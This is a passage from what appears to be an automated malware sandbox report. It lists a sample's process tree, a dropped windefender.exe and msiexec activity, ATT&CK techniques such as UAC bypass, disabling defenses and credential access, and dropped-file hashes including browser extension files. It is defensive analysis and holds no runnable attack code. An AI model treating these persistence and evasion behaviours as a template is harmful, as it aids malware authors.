                                                                                                                                                          PID:1916
                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-477355593-94335466547334456-1592937978915798798-278930108-263718917169315274"
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1680
                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "584471030-1959098418-1555171695-4127880261637653718650311902387830931059924122"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1408
                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "1359609222485120888-1542404531-5090541071067198591481985795-10805687741946351711"
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2676
                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "253498812-611137715-1212037490-2043263192556374041831775206-74148080980262378"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1760
                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-1599658861175167846-1638504969-155895102210426695071477661520-1896827289-593824699"
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2044
                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3028
                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "1210934890-7634412-11882128121024634183-555537256738376250-955378137-823934485"
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:1968
                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "1476525120-1363944081648234518-977105260130643631441361357708919864-1899261469"
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:2164
                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "1913446330-6005968671001302721173702659923782029649969534-1262075566430633109"
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:1588
                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "21166980601522410928-552248819-1802095740-43635196347011617-18660980821091167229"
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:1116
                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "890372171-426432896-6667370941528441684673350892816163925420630957-1545624789"
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:1216
                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-717937225-511224666-374971009-536001048-853125461-89664752495443830-1333731826"
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:2640
                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "2006448581-1818888388-166319173318923680781557296462943537522-487436672-216968570"
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:1788
                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-347844308-1062944225-2088338676531991430166034086317883295281642514454-706378523"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1740
                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "15549398718479064811426311681653752537-64003666715392789091521795658-165426525"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:2468
                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "1699437774118379260-4538525805756965581020099945-1603449188-6352021221098986184"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1828
                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-1690324505-7615736792004018497-1184872413268707575-9336785897851795-315647556"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:2688
                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-160190945180639941-1937807682-964073214-1348564420349230985-1909065777952346350"
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:1476
                                                                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1544
                                                                                                                                                                                              • C:\Windows\windefender.exe
                                                                                                                                                                                                C:\Windows\windefender.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                PID:2424
                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                • Registers COM server for autorun
                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                PID:1508
                                                                                                                                                                                                • C:\Windows\system32\MsiExec.exe
                                                                                                                                                                                                  C:\Windows\system32\MsiExec.exe -Embedding 2EFC275E854D0FA5FCD02034B4462256
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  PID:2340
                                                                                                                                                                                                • C:\Windows\system32\MsiExec.exe
                                                                                                                                                                                                  C:\Windows\system32\MsiExec.exe -Embedding DCD48CDE1815B6C449499FA2294EBAD9 M Global\MSI0000
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                  PID:1352
                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding AD8181C20C99F4593387A41215E8DB5F M Global\MSI0000
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:832
                                                                                                                                                                                                • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                  "LogonUI.exe" /flags:0x0
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2280

                                                                                                                                                                                                  Network

                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                  Execution

                                                                                                                                                                                                  Command and Scripting Interpreter

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1059

                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1053

                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                                                  2
                                                                                                                                                                                                  T1543

                                                                                                                                                                                                  Windows Service

                                                                                                                                                                                                  2
                                                                                                                                                                                                  T1543.003

                                                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                                                  2
                                                                                                                                                                                                  T1547

                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                  2
                                                                                                                                                                                                  T1547.001

                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1053

                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                                                  2
                                                                                                                                                                                                  T1543

                                                                                                                                                                                                  Windows Service

                                                                                                                                                                                                  2
                                                                                                                                                                                                  T1543.003

                                                                                                                                                                                                  Abuse Elevation Control Mechanism

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1548

                                                                                                                                                                                                  Bypass User Account Control

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1548.002

                                                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                                                  2
                                                                                                                                                                                                  T1547

                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                  2
                                                                                                                                                                                                  T1547.001

                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1053

                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                  7
                                                                                                                                                                                                  T1112

                                                                                                                                                                                                  Abuse Elevation Control Mechanism

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1548

                                                                                                                                                                                                  Bypass User Account Control

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1548.002

                                                                                                                                                                                                  Impair Defenses

                                                                                                                                                                                                  5
                                                                                                                                                                                                  T1562

                                                                                                                                                                                                  Disable or Modify Tools

                                                                                                                                                                                                  3
                                                                                                                                                                                                  T1562.001

                                                                                                                                                                                                  Disable or Modify System Firewall

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1562.004

                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1497

                                                                                                                                                                                                  Subvert Trust Controls

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1553

                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1553.004

                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                  Unsecured Credentials

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1552

                                                                                                                                                                                                  Credentials In Files

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1552.001

                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                  8
                                                                                                                                                                                                  T1012

                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1497

                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                  8
                                                                                                                                                                                                  T1082

                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                  2
                                                                                                                                                                                                  T1120

                                                                                                                                                                                                  Collection

                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1005

                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1102

                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                  • C:\Config.Msi\f7a33e1.rbs
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    893KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    b03fa5d1c8191546ab4ab7880150fe7f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    1d571e89b41e73f0cf6d869f7b5db37213bf241b

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    fb0a3d2dcf76c7e421f9d11fc7b54f15a709f53a39c74d3742590fbb5259e538

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    2ea5ccbb4c26b8d3ea6bfa2de8fdc7da48c39cb9c0af907ff6901265cd0ecc59c5d130a85a54e8daab332d5168eb334053e242269ae499e8a480781bcec6a558

                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    f6874a4ccdf3de588de22c9ccf9c9621

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    d42ecf7c2a58c26b64212ade7b0881c8661e0f9d

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    4e486c112ec8f47cfaf69aa2500ee9592c0bb5ff233fe2c9ea35e5b1c6a05040

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    ea2e5b0532b30011f6b9ae9131bd06a1cd6c2f6e55ba555c1863fb9aa183ce03246b34021fb9d0d0e8579ea0d692fc3466b62bb17e80afdd60f8c0cb05b775a7

                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    a266bb7dcc38a562631361bbf61dd11b

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    3b1efd3a66ea28b16697394703a72ca340a05bd5

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    344B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e31644594bfe1e7b4505f17d550c264e

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    85a53fa2be2e6cbdb8a44bbd41df5a26fcf5a18f

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    93fc0ff294022b24cb2306bc8a3b9cd53bf1bca248b719110bfee839279afd33

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    b17a759bca7e056d7bf455682d5a093d2d5a572fabc92d9909d59174ba6fd005ca1dd1d30cdd9634d101d8b8b7264ea0d988bfc56a02fa3f2e8419aca0419eaa

                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    344B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    4f20ac365941b1a061c510cf7f69aaed

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    0284e035f5023bfe5f4deac952c4a7fb8ddb7fc8

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    401c180c60d0b2b6786cfe346cdf08d3bb9195bf135f16235d3b7f35a80ebe43

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    443dfcacc19bdacca218bcac6a48dde885505c4539bb4567098e75ab89c8176ad6076ecebcd97aca21e1c03c5f048a3fb029f17b5cad0068053b12b5359c866e

                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    344B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    22ee2b64d3c40c7559bc37b51482ddf9

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    e93491af452a69dd10c950995d01a971065f27f9

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    6577559daf5eff841a17c581cd16cd44ddb565e1e8ecc6feaaa5342ab6d8d4c8

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    b486d74cc81bc9c932300bcf90e4f91f738bd91b789de496e9f5f0d2a94db244c906a2193aac33409c67dabc33ae689664d72d9c45c99b6658fa8bc9bd5c3079

                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    344B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    5b4163960f9b6220aa5cb7899b80e054

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    fca0302dc8c509e934ee14d36e7a0ab7cfc11259

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    b7090eac78ad5d996d194d65401f5f96c5c4fa83c9ee2aa790b6563cd81b8017

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    6e5f3a4fe155753d2a2be3d58982bd5dec6b4704d318fa4c73235ac900889688889787659a03a97cdc629945512c760712e6771ce2cfd80e821ba71c6794d82e

                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    344B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    443cb738453ce087f3b14b25d25b2999

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    1c12de98e2ed838e44261dafd209be1ebafc1b31

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    ac568e717a4e2fdb5c41edeac841b5e414df0787f1f3f79f02e55d19afb36642

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    865cec5d7b10cd270a4e1ef3f9aef6c8361ff8ecb7642c3b85f3489304039fc57afc1a40077275bf430cf0c1922144c40e6e2c8ef1f0f9a5e6a899bd7a33d651

                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    242B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    b1e1307a20ed10035f8d5360ec281bca

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    5346493a206a36c3375e5d4165a4f6335d46dbdb

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    152b36f6a66c1925fba39c204f1ee6d3c30ab770bfc8b716a63ee57d10aac52c

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    f6cc86ad96061e6855ea8007b50dce321c2aad6b2d7b73d589fef6937fc1a9dc571bfb0ae3bbe96b7518e0a502c6b0597fe9291d6ac0bde2a4179a579976e0a2

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    187B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_TO\messages.json
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2.1MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    01ac4bb2243926f88ce0441a4c94c27f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    b3186fdeab3c5299883a9d6bb09b04789d120762

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    6db8f0d2c8a6b7ed5b4bcd1bc697318be80ab8ebe9881cc2073976f2db56d9ae

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    cdb28ce866c22f1b59fd16cabcfebb8570e3e2b2ca2d70a5e12c7b5fcea3cafab40e31774c650d3766bad92b37a27daf8f3dbdf9591345a327b6090a92d0d058

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\es\messages.json
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    151B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    136B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    150B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    9KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    b25bfbf0e8962b289e2e40a7debd9d8d

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    32c9e0fd105b4f2284e389f6d34d5283823cfe81

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    9157a59815e2ccb87c6e5379437adcc933c63da5d62c4148a1c780b1599884e9

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    bce7622734c05e6f697d31eb468742a2d89f6374a977d16142ec86fad5372f8f4dabc9c810d9eba0ed404d861d029f082873f721960be1d572ad3cc0c983d278

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    9KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    9c5eb0ad78148c10afc06d709a6c3154

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    abd33a5d84a91bfe533544f505a11cafe7b704fd

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    626321be2d918973d3f936d88d1551ca93eb30e3e9a61e975f244ed55d0907c2

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    8b8b982abf833c29e15b90a7c621be492813397d64c5bad83cf7a0517f00512b7c8397beb11890f89348d968e4790d373ee97adcabe64c6b82cf6fd79c81bfc0

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    27KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    ba903225e59316a63733bd24c6a5c1d5

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    ea0383e6f6d2e3df6a52a1c02855051c406b8e44

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    3d6579187288627c82650fcfd3dc441199c9da540b24c375fed62db243a95920

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    bf6ac5af0795c84d3e2bf454b38eadcf3412a245d25baac11276602298a56c91133c54ce219eec619cd339753b83d121c8096d8c0d2e24ae128c6811c82f9fc2

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    28KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    1bd1d0e3a27f4997175763aed062a009

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    b5c808b3e6a41115db5d9d679680050b096c9660

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    5b05ac5ff13c8dd8caa4193c6db63dcb3a5c6083d16b78305e4d8751b5cf5118

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    b333aec3c896b0e7ae81739c5e8f218ce09b42904cc2b8d2d3a65473303db039471a011c8dac5e109b9191d36feaa78df63e0c69cf52ed98f064ec1f2d14e895

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\81950f7e7cbd108086cf2da3a401afdfffc60d9b485aac5dd52f7a137c00f950\2d0b08d50e834782961246000e0f37c3.tmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    9ebdfddef94d83a22ca495605e3ad4d2

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    cbfc6904b0919bfce75a268844d6c93777b8a20b

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    aefefcdfe4970babad8bf83bea0b1b44f4ca4b8fb921310759983c6d143c72dc

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    b242856bf6b57d5a89c3796d99df98a90326897cd8235a8bf149e9e59753dc64a346ce30091ca6dd0e9574212b65c40ca60b2bd73a06ebfb0b58fe135f7d51c2

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\28a4c526
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    5.9MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    dcc26dd014bad9eafa9066d3781b615d

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    b0cb8621ca58a196ac73bed4e525deacfaf2d836

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    69502ffc7e2b8946d420e682cd1421f58a17f489590f761c580ce2a4feb74ae3

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    5a7804fdebe09aada86e327899fa7ce6830c26c426d398dd72ef68121c33e59c2572709a725f43d6f1d31c52e7b4ea10b2128d00d530a00ef9db9a8efef204e3

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS23F5.tmp\Install.exe
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6.8MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e77964e011d8880eae95422769249ca4

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    8e15d7c4b7812a1da6c91738c7178adf0ff3200f

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    8feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS32B4.tmp\AppVShNotify.exe
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    221KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    f085259a7c14b5072658974b59fa787a

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    2f0be555543b3a2ef4742b8fa0d5e762c6593fe2

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    dc8300a3e3c8857e0a3e42cdb96c1636f8c1a5052a09b1abe07a3cd410d875aa

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    bd70b48991491f6ac49e1b5101ff298f5333694df76c77758fdf6139711fe1e3257f920ba4f8ffc2dc1cb8500e81d5901302a186e5bdc97ea7064ccd0c6c5a7f

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS32B4.tmp\BackgroundTransferHost.exe
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    60KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    777bbc2e4dba510015f23789da4bb304

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    61b3b6ec7d7ceed71e0effc7b011111749e18f6a

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    09b6ecdff76eaf9a7ff6bddc8108f3424f1e35675ad4288acd3176f54c4997ca

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    6368473a6352be757f800a2baaf1a91c8de9712d51184b76e36ac64243844574172f97caeaa2cddcc0fb5b309e7369758baa06533ff2c68832f4d149bca9aba2

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS32B4.tmp\BdeUISrv.exe
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    76KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    094970bbd30bbb9a9f7ff8f875d2354e

